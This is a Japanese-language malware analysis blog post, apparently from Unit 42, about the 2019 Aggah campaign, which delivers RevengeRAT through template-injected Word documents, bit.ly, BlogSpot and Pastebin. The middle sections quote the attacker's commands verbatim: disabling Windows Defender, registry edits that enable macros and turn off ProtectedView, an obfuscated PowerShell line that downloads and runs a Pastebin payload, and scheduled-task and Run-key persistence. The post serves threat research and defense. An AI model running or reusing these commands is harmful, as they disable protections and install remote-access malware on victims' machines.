[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# Aggahキャンペーン: 大規模キャンペーンでC2用に使用されたBit.ly、BlogSpot、およびPastebin

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 4 分で読めます

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Brittany Barbehenn](https://unit42.paloaltonetworks.com/ja/author/brittany-barbehenn/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2019年4月17日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [Aggah](https://unit42.paloaltonetworks.com/ja/tag/aggah-ja/)
  * [RevengeRAT](https://unit42.paloaltonetworks.com/ja/tag/revengerat-ja/)
  * [Template Injection](https://unit42.paloaltonetworks.com/ja/tag/template-injection-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/?pdf=download&lg=ja&_wpnonce=40dbae5d0f "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/?pdf=print&lg=ja&_wpnonce=40dbae5d0f "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=Aggahキャンペーン:%20大規模キャンペーンでC2用に使用されたBit.ly、BlogSpot、およびPastebin&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Faggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Faggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Faggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign%2F&title=Aggahキャンペーン:%20大規模キャンペーンでC2用に使用されたBit.ly、BlogSpot、およびPastebin "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Faggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign%2F&text=Aggahキャンペーン:%20大規模キャンペーンでC2用に使用されたBit.ly、BlogSpot、およびPastebin "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Faggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=Aggahキャンペーン:%20大規模キャンペーンでC2用に使用されたBit.ly、BlogSpot、およびPastebin%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Faggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign%2F "Share in Mastodon")

## 概要

2019年3月、Unit 42は、主に中東のある国の組織に的を絞っているようにみえた攻撃キャンペーンを調べ始めました。さらなる分析から、このアクティビティが、その地域だけでなく、米国と欧州およびアジアの全域にも影響を及ぼすさらに大規模なキャンペーンの一部である可能性が明らかになりました。

配信文書の分析から、それが[テンプレート インジェクション](https://attack.mitre.org/techniques/T1221/)を介してリモート サーバーから、悪意のあるマクロが有効化された文書をロードするように作成されていることがわかりました。これらのマクロは、BlogSpot投稿を使用してスクリプトを取得します。このスクリプトは複数のPastebin貼り付けを使用して追加のスクリプトをロードし、最終的には、最後のペイロードが、C2用のduckdns\[.\]orgドメインが設定されたRevengeRATとなります。弊社の調査において、最終的にPastebinでホストされているRevengeRATをインストールするための同じプロセスに従っている複数の関連する配信文書が見つかりました。これは、攻撃者が攻撃キャンペーン全体を通じてこれらのTTPを使用したことを示唆しています。

当初、このアクティビティはGorgon Groupと関連している可能性があると弊社は考えました。弊社の仮説は、RevengeRATの使用を含む高度なTTPに基づいていました。ただし、Unit 42ではまだ、Gorgon Groupと関連することを色濃く示すその他の指標との直接的な一致を特定していません。このため、適度な確実性で、このアクティビティをGorgon Groupに帰属させることはできません。

それを考慮して、Unit 42は、攻撃者の別名"hagga"に基づいて、このブログで説明するアクティビティをAggahキャンペーンと呼んでいます。"hagga"は、RevengeRAT C2サーバーへ送信されるデータを分割するために使用され、RevengeRATのペイロードをホストするために使用されたPastebinアカウントの1つの名前です。

## 配信

Aggahキャンペーンに関する弊社の調査は、2019年3月27日に電子メールを介して、中東のある国の組織に送信された配信文書から開始されました。この電子メールは、恐らくなりすましですが、同じ国内の大手金融機関を発信元に見せかけていました。電子メールの件名は、"お客様の口座がロックされています(Your account is locked.)"というものです。この最初の配信文書は、中東のある国の組織、特に、教育、メディア/マーケティング、および政府関連の垂直市場の組織に送信されました。4日後の3月31日、同じ配信電子メールが中東の2番目の国で金融組織に送信されたことがわかりました。その後、この配信文書は、テクノロジー、小売、製造、州/地方自治体、病院、医療、その他の専門的ビジネスなどの同様の垂直市場を標的として、米国、欧州、およびアジア内の組織に送信された、より大規模なキャンペーンの多数の中の1つにすぎないことが判明しました。関連する文書は機能上同様であるため、分析した元のサンプルについて説明します。
![図1.ユーザーがマクロを有効化するように仕向けるためにActivity.docで使用されたルアーの画像](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-188.png) 図1.ユーザーがマクロを有効化するように仕向けるためにActivity.docで使用されたルアーの画像

3月27日に送信された電子メールには、ファイル名が"Activity.doc" (SHA256: d7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946) というWord文書が添付されており、これが[テンプレート インジェクション](https://attack.mitre.org/techniques/T1221/)を介したリモートOLE文書のロードを行おうとしていました。"Activity.doc"を開くと、マクロを実行可能にするために、ユーザーがコンテンツを有効化するように仕向けるルアーとして、図1の画像が表示されます。Office 365のオンライン版のWordではマクロが機能しないため、ルアーは、デスクトップ版のMicrosoft Wordで文書を開く必要があることをユーザーに示唆します。"Activity.doc"ファイルにはマクロは含まれていませんが、そのファイルがリモート サーバーからロードするOLE文書にマクロが含まれています。

## Activity.docの分析

配信文書は、[テンプレート インジェクション](https://attack.mitre.org/techniques/T1221/)を使用して、リモート サーバーでホストされているファイルをロードします。図2は、配信文書のフッターのコンテンツを示しています。これが、hxxps://static.wixstatic\[.\]com/ugd/05e470\_b104c366c1f7423293887062c7354db2.docからのリモートOLE文書のロードを行おうとします。
![図2.リモートOLEの位置を示すActivity.docのフッター](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-189.png) 図2.リモートOLEの位置を示すActivity.docのフッター

Activity.docファイルのフッター内でロードされたリモートOLEファイルは、実際にはRTFファイル(SHA256: 5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f)であり、かなりの量の「ジャンク」コードを含む、極めて難読化された、埋め込みのExcel文書をロードします。このマクロの目的は、"Shell"コマンドを介して次のURLをデコードし実行することです。

mshta hxxp://www.bitly\[.\]com/SmexEaldos3

上記のコマンドは、組み込まれた"mshta"アプリケーションを使用して、提供されたURL、この場合はBit.lyサービスを使用して短縮されたURLのコンテンツをダウンロードします。WildFireの分析中、この短縮されたbit.ly URLは、図3のHTTP応答の"Location"フィールドに見られるように、hxxps://bjm9.blogspot\[.\]com/p/si.htmlへリダイレクトされました。
![図3.Blogspotでホストされたブログを指し示すBit.ly短縮リンク](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-190.png) 図3.Blogspotでホストされたブログを指し示すBit.ly短縮リンク

上記のGETリクエストでわかるとおり、リダイレクトによってブラウザ(この場合、"mshta.exe")は、blogspot\[.\]comでホストされているブログを指しています。図4からわかるとおり、このBlogSpot記事は少し奇妙に見えますが、必ずしも悪意があるわけではありません。

![図4. Bjm9.blogspot\[.\]comの画面キャプチャ](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-191.png) 図4. Bjm9.blogspot\[.\]comの画面キャプチャ ブログでホストされたコードを分析することで、それに埋め込まれた、いくつかのアクティビティを実行するJavaScriptが実際に含まれていることを発見しました。図5は、一見したところ無害に見えるブログでホストされている、悪意のあるJavaScriptを示しています。

![図5.bjm9 Blogspot記事に埋め込まれたスクリプト](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-192.png) 図5.bjm9 Blogspot記事に埋め込まれたスクリプト

この悪意のあるスクリプトは、侵害したシステム上でいくつかのアクティビティを実行します。最初に、設定されているシグネチャを削除して、Microsoft Defenderを妨害しようとします。また、このスクリプトは、いくつかのOfficeアプリケーションのプロセスとともに、Defenderのプロセスも停止します。これらはすべて、以下のコマンドラインを使用して実行されます。  
cmd.exe /c cd ""%ProgramFiles%\\Windows Defender"" \&amp; MpCmdRun.exe -removedefinitions -dynamicsignatures \&amp; taskkill /f /im winword.exe \&amp; taskkill /f /im excel.exe \&amp; taskkill /f /im MSPUB.exe \&amp; taskkill /f /im POWERPNT.EXE \&amp; forfiles /c ""taskkill /f /im MSASCuiL.exe"" \&amp; forfiles /c ""taskkill /f /im MpCmdRun.exe"" \&amp; exit

|---|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 | cmd.exe /c cd ""%ProgramFiles%\\Windows Defender"" \&amp; MpCmdRun.exe -removedefinitions -dynamicsignatures \&amp; taskkill /f /im winword.exe \&amp; taskkill /f /im excel.exe \&amp; taskkill /f /im MSPUB.exe \&amp; taskkill /f /im POWERPNT.EXE \&amp; forfiles /c ""taskkill /f /im MSASCuiL.exe"" \&amp; forfiles /c ""taskkill /f /im MpCmdRun.exe"" \&amp; exit |

次に、スクリプトは、マクロを有効にし、ProtectedViewを無効にするためのレジストリ キーを設定することで、Office製品内のセキュリティ メカニズムを無効化しようとします。まず、スクリプトは、以下のレジストリ キーの値を"1"に設定して、Word、PowerPointおよびExcelでマクロを有効化します。

HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\VBAWarnings  
HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\VBAWarnings  
HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\VBAWarnings  
HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\VBAWarnings  
HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\VBAWarnings  
HKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\VBAWarnings  
HKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\VBAWarnings  
HKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\VBAWarnings  
HKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\VBAWarnings  
HKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\VBAWarnings  
HKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\VBAWarnings  
HKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\VBAWarnings  
HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\VBAWarnings  
HKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\VBAWarnings  
HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\VBAWarnings

次に、スクリプトは、以下のレジストリ キーの値を"1"に設定して、Word、PowerPointおよびExcel内のProtectedViewセキュリティ メカニズムを無効化しようとします。

HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV  
HKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV  
HKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV  
HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV  
HKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV  
HKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV  
HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV  
HKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV  
HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV  
HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV  
HKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV  
HKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV  
HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV  
HKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV  
HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV  
HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV  
HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV

レジストリ キーを変更する命令を含め、マクロを有効にし、Office内のProtectedViewを無効にする手法については、弊社の[Gorgon Groupを取り上げたブログでも説明されています。](https://unit42.paloaltonetworks.com/ja/unit42-gorgon-group-slithering-nation-state-cybercrime/)また、Windows DefenderとMicrosoft Officeアプリケーションのプロセスを停止する策略は、同様にGorgonによっても行われています。Gorgon Groupもまた、その攻撃の中でbitly URL短縮サービスを使用しています。これらは明らかに手法として重なりますが、弊社ではまだ、この攻撃キャンペーンがGorgonに関連するという具体的な証拠を見つけていません。

Blogspotでホストされているスクリプトは、その後、以下を含む3つの主要なアクティビティを実行します。

1. Pastebin URLからのぺイロードのダウンロード
2. Pastebin URLから定期的にスクリプトを取得して実行するためのスケジュールされたタスクの作成
3. Pastebin URLからスクリプトを取得して実行するための自動実行レジストリ キーの作成

## Pastebinからのペイロードの取得

Blogspotでホストされているスクリプトは、Pastebin URLからPortable Executableのペイロードを取得し、それを実行します。このスクリプトは、次のコマンドを作成し、WScript.Shellオブジェクトを使用して、それを実行しようとします。  
mshta.exe vbscript:CreateObject(""Wscript.Shell"").Run(""powershell.exe -noexit -command \[Reflection.Assembly\]::Load(\[System.Convert\]::FromBase64String((New-Object Net.WebClient).DownloadString(\\'h\\'+\\'t\\'+\\'t\\'+\\'p\\'+\\'s:\\'+\\'//p\\'+\\'a\\'+\\'s\\'+\\'t\\'+\\'e\\'+\\'b\\'+\\'i\\'+\\'n\\'+\\'.\\'+\\'c\\'+\\'o\\'+\\'m\\'+\\'/\\'+\\'r\\'+\\'a\\'+\\'w\\'+\\'/\\'+\\'2LDaeHE1\\'))).EntryPoint.Invoke($N,$N)"",0,true)(window.close)

|---|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 | mshta.exe vbscript:CreateObject(""Wscript.Shell"").Run(""powershell.exe -noexit -command \[Reflection.Assembly\]::Load(\[System.Convert\]::FromBase64String((New-Object Net.WebClient).DownloadString(\\'h\\'+\\'t\\'+\\'t\\'+\\'p\\'+\\'s:\\'+\\'//p\\'+\\'a\\'+\\'s\\'+\\'t\\'+\\'e\\'+\\'b\\'+\\'i\\'+\\'n\\'+\\'.\\'+\\'c\\'+\\'o\\'+\\'m\\'+\\'/\\'+\\'r\\'+\\'a\\'+\\'w\\'+\\'/\\'+\\'2LDaeHE1\\'))).EntryPoint.Invoke($N,$N)"",0,true)(window.close) |

上記のコマンドは、https://pastebin\[.\]com/raw/2LDaeHE1でPastebin上でホストされているPortable Executableファイルをダウンロードし、そのURLからダウンロードしたbase64をデコードして、それを実行します。図6は、スクリプトによってダウンロードされた実行可能ファイルをホストしているPastebinページを示しています。
![図6.2LDaeHE1 Pastebinページ](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-193.png) 図6.2LDaeHE1 Pastebinページ

デコードされたペイロードは、以下の属性を備えています。

|---------|-------------------------------------------------------------------|
| SHA256  | b9b67c885200f90eaf9c4911b3a7f5e6707bcb51d1b892df1bde110 13a60f6b5 |
| コンパイル時刻 | 2019-03-20 19:43:08                                               |

*表2.pastebin\[.\]com/raw/2LDaeHE1からのデコードされたペイロード*
![図7.RevengeRATの設定](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-194.png) 図7.RevengeRATの設定

このペイロードはVB.NETで記述され、"Nuclear Explosion"という名前が付けられていました。これは、図7に示すとおり、C2用のドメイン"lulla.duckdns\[.\]org"を使用するように設定されたRevengeRATの亜種です。

図8に見られる設定によると、C2サーバーへのデータの送信時に、文字列"hagga"を使用して情報を分割しています。これは、図6に見られるペイロード情報をホストしているPasteBinアカウントと同じ名前であり、Aggahキャンペーンの名はこれに因んでいます。
![図8.C2サーバーへ送信される情報を分割するために使用される文字列"hagga"を示す設定](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-195.png) 図8.C2サーバーへ送信される情報を分割するために使用される文字列"hagga"を示す設定

## スケジュールされたタスクの作成

Blogspotブログでホストされているスクリプトは別のコマンドを組み立て、100分ごとに実行する、"eScan Backup"と呼ばれるスケジュールされたタスクを作成します。このスケジュールされたタスクを作成するために使用されたスクリプトによって生成されるコマンド文字列は、次のとおりです。  
schtasks /create /sc MINUTE /mo 100 /tn eScan Backup /tr ""mshta vbscript:CreateObject(""Wscript.Shell"").Run(""mshta.exe https://pastebin\[.\]com/raw/tb5gHu2G"",0,true)(window.close)"" /F '

|---|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 | schtasks /create /sc MINUTE /mo 100 /tn eScan Backup /tr ""mshta vbscript:CreateObject(""Wscript.Shell"").Run(""mshta.exe https://pastebin\[.\]com/raw/tb5gHu2G"",0,true)(window.close)"" /F ' |

![図9.Pastebin URLに到達し、100分ごとにホストされたスクリプトを実行するために作成されるスケジュールされたタスク](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-196.png) 図9.Pastebin URLに到達し、100分ごとにホストされたスクリプトを実行するために作成されるスケジュールされたタスク

"eScan Backup"タスクは、組み込みのmshtaアプリケーションを使用して、Pastebin URL、具体的には、hxxps://pastebin\[.\]com/raw/tb5gHu2Gからスクリプトをダウンロードします。弊社ではこれを引き続きtb5gHu2Gスクリプトと呼びます。弊社では、攻撃者は、eScanアンチウイルス製品に関連していると見せかけるために"eScan Backup"という名前を選択したものと考えています。図9は、Windowsのタスク スケジューラ プログラム内のスケジュールされたタスクを示しています。

tb5gHu2Gスクリプトをダウンロードして実行するスケジュールされたタスクは永続性を目的としたものです。Windows Defenderを妨害し、Officeアプリケーションを停止するために同じコマンドを実行するからです。また、tb5gHu2Gスクリプトは、Blogspotブログでホストされているスクリプトと同じVBScriptを実行しようとします。これは、図6で示した"2LDaeHE1" Pastebinページからペイロードをダウンロードして実行します。図10は、tb5gHu2GスクリプトをホストしているPastebinページを示しています。
![図10. tb5gHu2G Pastebinページ](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-197.png) 図10. tb5gHu2G Pastebinページ

## 自動実行レジストリ キーの作成

Blogspotブログでホストされているスクリプトは自動実行レジストリ キーを作成します。これは、前述のスケジュールされたタスクを補完する第2の永続性メカニズムのようです。自動実行キーを作成するため、スクリプトは以下のコマンドを生成し、それを実行しようとします。  
CreateObject("Wscript.Shell").regwrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftUpdate", "C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(""Wscript.Shell"").Run(""mshta.exe%20http://pastebin\[.\]com/raw/YYZq1XR0″",0,true)(window.close)" , "REG\_EXPAND\_SZ"

|---|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 | CreateObject("Wscript.Shell").regwrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftUpdate", "C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(""Wscript.Shell"").Run(""mshta.exe%20http://pastebin\[.\]com/raw/YYZq1XR0″",0,true)(window.close)" , "REG\_EXPAND\_SZ" |

この実行キーは、さらに別のPastebin URLのhttp://pastebin\[.\]com/raw/YYZq1XR0でホストされているコンテンツのダウンロードを試み、Wscript.Shellオブジェクトを使用して、スクリプトとしてそのコンテンツを実行します。図11は、スクリプトのコンテンツを表示しているPastebinページを示しています。
![図11.YYZq1XR0 Pastebinページ](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-198.png) 図11.YYZq1XR0 Pastebinページ

YYZq1XR0 Pastebin貼り付けには、ほとんど役に立たない以下のスクリプトが含まれます。

\<script language="VBScript"\>  
self.close  
\</script\>

上記のスクリプトがほとんど役に立たないという事実は、攻撃者が必要なときに追加の機能を含む新たなスクリプトで、この貼り付けを更新する可能性があることを示唆しています。貼り付けが"Pro"アカウントを使用して作成されている場合は、貼り付けの編集ができます。これらの貼り付けはHAGGAという名前のアカウントによって作成されています。このアカウントは、攻撃者が感染したシステム上で実行するスクリプトを更新できるようにするためのPROアカウントであるようです。HAGGAには、以下の図12に示すとおり、いくつかの追加の貼り付けがあります。これらの貼り付けには、最終的にペイロードを作成するために使用される追加の悪意のあるスクリプトが含まれています。
![図12.HaggaのPastebinページ](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-199.png) 図12.HaggaのPastebinページ

## より大規模なキャンペーンの一部?

この特定のキャンペーンの調査中に、Bit.lyで確認可能なクリック数を調べました。2019年4月11日現在、上記の分析で参照したBit.lyリンク、SmexEaldos3には、北米、欧州、アジアおよび中東の全域にわたり、約20か国で1,900回を超えるクリックが含まれていました。この大量のクリック数から、弊社は、自分たちが実際のキャンペーンの極めて小さな部分のみを見ている可能性があることに気付きました。また、これらのクリック数には、調査や追及の取り組みにおける短縮リンクへの個人によるアクセスが含まれている可能性も非常に高いため、この数字は感染したホスト数を正確には表していません。
![図13. bitly SmexEaldos3ページのクリック数](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-200.png) 図13. bitly SmexEaldos3ページのクリック数

もう少し堀下げて、文書のプロパティを調べ、関連するアクティビティの特定に役立てるためにどの追加情報を使用できるかを確認しました。文書のプロパティは、これらのオペレータが海賊版とみられるMicrosoft Wordを用い、文書の作成者として文字列'Lulli moti myri'を使用していたことを示しています。この文字列を使用して、弊社のリポジトリを検索し、12のMicrosoft Office文書を特定しました。それらの半分はDOCXで、残りの半分はXLSでした。

すべての文書のタイムスタンプが2019年1月から4月までで、それぞれに、BlogspotページへリダイレクトされるBit.ly URLが含まれていました。これらの文書はすべて弊社にとって興味深いものでしたが、弊社は、元ファイルのActivity.docと同じBit.ly URLが設定された1つの文書に気付きました。このファイルには以下のSHA256が含まれています。

|--------|-------------------------------------------------------------------|
| SHA256 | ef837119fc241e8fde85f36f4635a71f6b87aecf39dc979961be914 f48c4ef4c |

*表3.Activity.docと同様に設定された文書*

弊社での分析中に、いくつかのBit.ly URLと、それらのリダイレクトの結果がRevengeRATのダウンロードであることを特定しました。ある特定のサンプルには、C2ドメインkronozzz2.duckdns\[.\]orgが含まれています。このサンプルには、以下のSHA256が含まれています。

|--------|-------------------------------------------------------------------|
